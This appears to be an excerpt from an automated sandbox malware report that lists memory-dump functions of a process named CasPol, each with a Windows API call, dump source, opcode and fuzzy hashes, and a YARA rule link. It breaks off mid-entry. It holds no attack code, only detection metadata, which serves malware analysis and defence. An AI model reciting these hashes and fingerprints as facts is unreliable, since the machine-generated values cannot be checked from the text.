                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAD2A Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000EA8,3121F35D,00000000,00000000,00000000,00000000), ref: 1D8AAD86
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumModulesProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1082081703-0
                                                                                                                                    • Opcode ID: 8568bd147ad6e927f85bdd48d66149ad20caba807e464ce5e3680d7877677913
                                                                                                                                    • Instruction ID: f83c0fe9f7c52a67f514abeb0db0fc8f532172c9c105eb9cf8d914d3ad296c63
                                                                                                                                    • Opcode Fuzzy Hash: 8568bd147ad6e927f85bdd48d66149ad20caba807e464ce5e3680d7877677913
                                                                                                                                    • Instruction Fuzzy Hash: 3311B272600344AFE711CF55DC85FA7FBB8EF44621F08846AED458B651D674A404CBB2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA48A Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(?,3121F35D,00000000,?,?,?,?,?,?,?,?,73583C68), ref: 1D8AA4E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: dd5006e77276292d6b57c503035f69890a3d523f6380ca6c0d215e70f0e076e1
                                                                                                                                    • Instruction ID: 7ab975b5780fac6b7438053a6b123d3080c4c3d67fb83930409694ee4fd4d1ce
                                                                                                                                    • Opcode Fuzzy Hash: dd5006e77276292d6b57c503035f69890a3d523f6380ca6c0d215e70f0e076e1
                                                                                                                                    • Instruction Fuzzy Hash: 5B114F7540E3C0AFD7138B259C95A52BFB49F47620F0D80DBED858F1A3D2695809CB72
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8ABEBE Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(?,00000EA8), ref: 1D8ABF27
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: b1afe15d4a19e3bd5bf80af3c3ef44e2d84ed11019443522fcc5dd1953323cba
                                                                                                                                    • Instruction ID: 0ce3fb093c09c699a51a3f7cdbb23d585223c9ea754273767d8692c1210916ed
                                                                                                                                    • Opcode Fuzzy Hash: b1afe15d4a19e3bd5bf80af3c3ef44e2d84ed11019443522fcc5dd1953323cba
                                                                                                                                    • Instruction Fuzzy Hash: FD11E571504344AFF721DF11DC85FA6FBA8DF44720F18849AFE485A281D2B5B548CFA6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: recv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                    • Opcode ID: b9cd82fd509a133792ec9d6146cd977d7d0318cc3f7d43511454e7dfab1970bc
                                                                                                                                    • Instruction ID: b2c3f747dfb4e7eb4d3b7ef163923f53a8e6492b1d77848e561924bc488f8a77
                                                                                                                                    • Opcode Fuzzy Hash: b9cd82fd509a133792ec9d6146cd977d7d0318cc3f7d43511454e7dfab1970bc
                                                                                                                                    • Instruction Fuzzy Hash: B3118F76509380AFD712CF15DC84F52FFB4EF46224F08849AED898F652D275A418CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA89A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D8AA8E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: 35504bb0ccdb17bec7fc719b8f7acbedfc09422e39a74437150462f605b0a49c
                                                                                                                                    • Instruction ID: e8ab5970c60632539c91c037a8cb9c11b9c3ca0c5155c314d52a9230917c8e43
                                                                                                                                    • Opcode Fuzzy Hash: 35504bb0ccdb17bec7fc719b8f7acbedfc09422e39a74437150462f605b0a49c
                                                                                                                                    • Instruction Fuzzy Hash: 37115E726003419FE750CF2AD885B67FBE8EF44620F08C4AAED49CBA42D675E445CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AB082 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesExW.KERNELBASE(?,?,?), ref: 1D8AB0C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 97ca09da0ccdf6147a0aeb4e6058dbbdeca008303b7b944531ff909a9b41d3cb
                                                                                                                                    • Instruction ID: d9c83971f740fdb754dba144f8ed2dfe12f7c667bb1595ac08e475abe59aad10
                                                                                                                                    • Opcode Fuzzy Hash: 97ca09da0ccdf6147a0aeb4e6058dbbdeca008303b7b944531ff909a9b41d3cb
                                                                                                                                    • Instruction Fuzzy Hash: 7C0192726043449FEB10CF26D885B56FBE4EF44620F08C8AAED59CB252D675E454CF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAF32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • K32GetModuleBaseNameW.KERNEL32(?,00000EA8,?,?), ref: 1D8AAF82
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BaseModuleName
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 595626670-0
                                                                                                                                    • Opcode ID: e8e99a137daf4e6ce65f71e2590de7401eb9613c3262aecec2b11c384fe84ce6
                                                                                                                                    • Instruction ID: 1bba0522f8d12040df34fdf9ff3efa585b19d62a5271af25c659d9ee9a3003f0
                                                                                                                                    • Opcode Fuzzy Hash: e8e99a137daf4e6ce65f71e2590de7401eb9613c3262aecec2b11c384fe84ce6
                                                                                                                                    • Instruction Fuzzy Hash: 6E017172A00200ABE310DF16DD45B26FBA8FB89A20F14856AED089B641D671F515CBE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000EA8,?,?), ref: 1D8AA1C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2029273394-0
                                                                                                                                    • Opcode ID: e84d0acad9a66568b9655c6cabda80457e9db0d91b3933c7552c6302b1d6cd68
                                                                                                                                    • Instruction ID: 11260ffe54f6fd8a5b90bb580d07cca2f6e7f3e133ae2c7c5eea9601de3bc79f
                                                                                                                                    • Opcode Fuzzy Hash: e84d0acad9a66568b9655c6cabda80457e9db0d91b3933c7552c6302b1d6cd68
                                                                                                                                    • Instruction Fuzzy Hash: C8017172A00200ABE310DF16DD45B26FBA8FB89A20F14856AED089B641D675F515CBE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AB396 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MkParseDisplayName.OLE32(?,00000EA8,?,?), ref: 1D8AB3E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DisplayNameParse
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3580041360-0
                                                                                                                                    • Opcode ID: 100339ddac45a38f5e7e233f42e5ec9802e56fc0957c20cfe237fc93208475a9
                                                                                                                                    • Instruction ID: 41aae99939a176016259d8548a47d8f22ed754dfc0da9896055f423707ac9784
                                                                                                                                    • Opcode Fuzzy Hash: 100339ddac45a38f5e7e233f42e5ec9802e56fc0957c20cfe237fc93208475a9
                                                                                                                                    • Instruction Fuzzy Hash: 33016272900200ABD350DF1ADD46B26FBA8FB89A20F14816AED085B741D671F555CBE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA76E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000EA8,?,?), ref: 1D8AA7BE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                    • Opcode ID: e6548d33271bc7029e3b8528ba480afe4ae6bc4fbf53f11975caf9804aa76e80
                                                                                                                                    • Instruction ID: aa16b1a92a7c269c340d81b19c5b63b71a478ce8b06998edda231b0c9fc1c25f
                                                                                                                                    • Opcode Fuzzy Hash: e6548d33271bc7029e3b8528ba480afe4ae6bc4fbf53f11975caf9804aa76e80
                                                                                                                                    • Instruction Fuzzy Hash: CE016272900200ABD350DF1ADD46B26FBA8FB89A20F14816AED085B781D771F555CAE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AB50A Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Initialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                    • Opcode ID: 4fb6524afec536f877690f7d7f32217480f994aebaefda78099485c68235b7b4
                                                                                                                                    • Instruction ID: 776b8657bc91632a425673056e1d6be94bde3fde8d2459bc7115273f281324d0
                                                                                                                                    • Opcode Fuzzy Hash: 4fb6524afec536f877690f7d7f32217480f994aebaefda78099485c68235b7b4
                                                                                                                                    • Instruction Fuzzy Hash: 8101AD719042849FEB10CF15E889B95FBA0EF44720F0CC8AADD488F256D275A448CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA4B6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(?,3121F35D,00000000,?,?,?,?,?,?,?,?,73583C68), ref: 1D8AA4E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: ace8c975c7ad00926c1483e760c84bec7a77ffe3a0c3f7e1b2fe0aca22e363ff
                                                                                                                                    • Instruction ID: 73fca78eab33552bc41020f1f55389d66785205c2cf55b55288b87930b44f7a0
                                                                                                                                    • Opcode Fuzzy Hash: ace8c975c7ad00926c1483e760c84bec7a77ffe3a0c3f7e1b2fe0aca22e363ff
                                                                                                                                    • Instruction Fuzzy Hash: 3DF0AF359043449FE720CF06D889BA6FBA0EF44620F0CC0AAED494B756D279A548CFA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20653F48 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,Q(s
                                                                                                                                    • API String ID: 0-848233777
                                                                                                                                    • Opcode ID: 1b17fd3d52c62ef3d25275c71aa5bff14cbe6747a6426241846cffc748f958a0
                                                                                                                                    • Instruction ID: bca261394e77f0e41cbcd47394f5904a9f34f979e72fef6a1cdb3ea28a1b5f7c
                                                                                                                                    • Opcode Fuzzy Hash: 1b17fd3d52c62ef3d25275c71aa5bff14cbe6747a6426241846cffc748f958a0
                                                                                                                                    • Instruction Fuzzy Hash: 2F81C331B042149BDB19DBF9C890BEE7BF2AF88200F154469D606FB390DE309E45CB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20654610 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: QHe
                                                                                                                                    • API String ID: 0-261674121
                                                                                                                                    • Opcode ID: fbaa5639b1af7631b53a32934de2dfc4dd36223c0c445f3b9b98f953ec5b50fa
                                                                                                                                    • Instruction ID: 15525cedad74d717f76aab78a72a1e8f17101b896287ef42230665676741a04d
                                                                                                                                    • Opcode Fuzzy Hash: fbaa5639b1af7631b53a32934de2dfc4dd36223c0c445f3b9b98f953ec5b50fa
                                                                                                                                    • Instruction Fuzzy Hash: A041A235A00229AFCB10CFA4CC44AAEBBB6FF49304F158159E909AB661D731EE16DB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC563E6 Relevance: .9, Instructions: 871COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8495bff19229cc4fe85305f07fffaa2a4bea56a3a1043e93ce481524fac9139a
                                                                                                                                    • Instruction ID: 1b2c341281d77a71ec1f0b8d977eed497de0da7bd7d8cd67a6f131fc9877890e
                                                                                                                                    • Opcode Fuzzy Hash: 8495bff19229cc4fe85305f07fffaa2a4bea56a3a1043e93ce481524fac9139a
                                                                                                                                    • Instruction Fuzzy Hash: 497296B1B00245CFEB14DB68D498A8DBBF2EF48315F148869E406DB361DB39EC45EB19
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51F33 Relevance: .7, Instructions: 698COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2620cb2018ec9b55fcef9c47e5cb1edd0b76aca92a844e02f39b850a9aa46b91
                                                                                                                                    • Instruction ID: 56802e1e5fa620e25f2475fe460300cdc045480fba5238889b880faed55875ce
                                                                                                                                    • Opcode Fuzzy Hash: 2620cb2018ec9b55fcef9c47e5cb1edd0b76aca92a844e02f39b850a9aa46b91
                                                                                                                                    • Instruction Fuzzy Hash: 7B72E574A003698FDB61DF64C884B9DBBB6AF88204F0496D9D509AB345DB70AFC1CF81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC54AD0 Relevance: .6, Instructions: 563COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 789bb6def47d6ffd6c24e6b0b24a82eeb2a04d97c2ba2dc5cb2e70a9b43c3f8a
                                                                                                                                    • Instruction ID: cd6015e7d09769652713a6b8d25238f6ef34b52563ace898fb69bdaa46bf27ae
                                                                                                                                    • Opcode Fuzzy Hash: 789bb6def47d6ffd6c24e6b0b24a82eeb2a04d97c2ba2dc5cb2e70a9b43c3f8a
                                                                                                                                    • Instruction Fuzzy Hash: 4D12C234B043558FE705CBB8C8A0B9EBBB2AF89304F15846AD505EF3A1DB71AC05D756
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC58AF0 Relevance: .5, Instructions: 501COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21633b3deb4d968bf7b6b671d09ef3d8fff9c106048684590982414c839274e2
                                                                                                                                    • Instruction ID: 0b6ad32cdfe3e9d3720796b4b0af1f57478cedc95bb8388da496d8e9daa41362
                                                                                                                                    • Opcode Fuzzy Hash: 21633b3deb4d968bf7b6b671d09ef3d8fff9c106048684590982414c839274e2
                                                                                                                                    • Instruction Fuzzy Hash: 7202A230B00225CFDB44DB78C898B9EBBF2AF88324F158669D5159B3A5DF34E841CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52BD7 Relevance: .5, Instructions: 490COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f0abd72b4535e8bb933de220fd5f50d60ac7addfe7cf111db5fd4aa22bf17415
                                                                                                                                    • Instruction ID: 502d7cd8e9d631a0fe6137bce3a7a9ce42c4787d0519c48ff367880bfe9072c4
                                                                                                                                    • Opcode Fuzzy Hash: f0abd72b4535e8bb933de220fd5f50d60ac7addfe7cf111db5fd4aa22bf17415
                                                                                                                                    • Instruction Fuzzy Hash: 71425774A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DAA85DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52C07 Relevance: .5, Instructions: 487COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 935119a593979c2cbb0de72dee1b03ffdbe48ae995c14be75481b1613f1fe2e9
                                                                                                                                    • Instruction ID: 9586a3c2b096d8d0ddcb4d4a60aa3d7bb28126ed313adbfbecdb84f9d1e65da0
                                                                                                                                    • Opcode Fuzzy Hash: 935119a593979c2cbb0de72dee1b03ffdbe48ae995c14be75481b1613f1fe2e9
                                                                                                                                    • Instruction Fuzzy Hash: CB424774A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DAA85DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52C5B Relevance: .5, Instructions: 477COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2cc6087e06799169c4b0fa58f3848f83129e26098bf6910c75dded96a62c71ff
                                                                                                                                    • Instruction ID: c412043426094f849c956a7427f4d90582580dd3c131ffb6eb7c1d7f8f79a7bc
                                                                                                                                    • Opcode Fuzzy Hash: 2cc6087e06799169c4b0fa58f3848f83129e26098bf6910c75dded96a62c71ff
                                                                                                                                    • Instruction Fuzzy Hash: 8C325774A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DAA85DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52CAF Relevance: .5, Instructions: 467COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a5789eb93afe8845863910bec04c09305b97f661f993d13f9056d2e0c14ea955
                                                                                                                                    • Instruction ID: 2f4e69801435870102aa2368e9b8bec6e6b14bef5fc00a56ea63d3c73a360e2d
                                                                                                                                    • Opcode Fuzzy Hash: a5789eb93afe8845863910bec04c09305b97f661f993d13f9056d2e0c14ea955
                                                                                                                                    • Instruction Fuzzy Hash: E8325774A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DAA85DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52D03 Relevance: .5, Instructions: 457COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1505ff14b93366254aa5b2f8f8b9e62094d6e5c1817050d2b9e6c63a72392335
                                                                                                                                    • Instruction ID: 36f630d0adbd3f4f677aa4e0d8c5ebea783d571171368e157d66d67463c55a55
                                                                                                                                    • Opcode Fuzzy Hash: 1505ff14b93366254aa5b2f8f8b9e62094d6e5c1817050d2b9e6c63a72392335
                                                                                                                                    • Instruction Fuzzy Hash: FC325874A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DAA85DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52D57 Relevance: .4, Instructions: 447COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2e66512f9604d6a798b227da2ee4b4ff783ac2d52b7192d035ee4a068b934857
                                                                                                                                    • Instruction ID: 456cc625dbadcbbda5eeefec5ae5dde1d7d19eb7d8400a140bbd47418ae83a36
                                                                                                                                    • Opcode Fuzzy Hash: 2e66512f9604d6a798b227da2ee4b4ff783ac2d52b7192d035ee4a068b934857
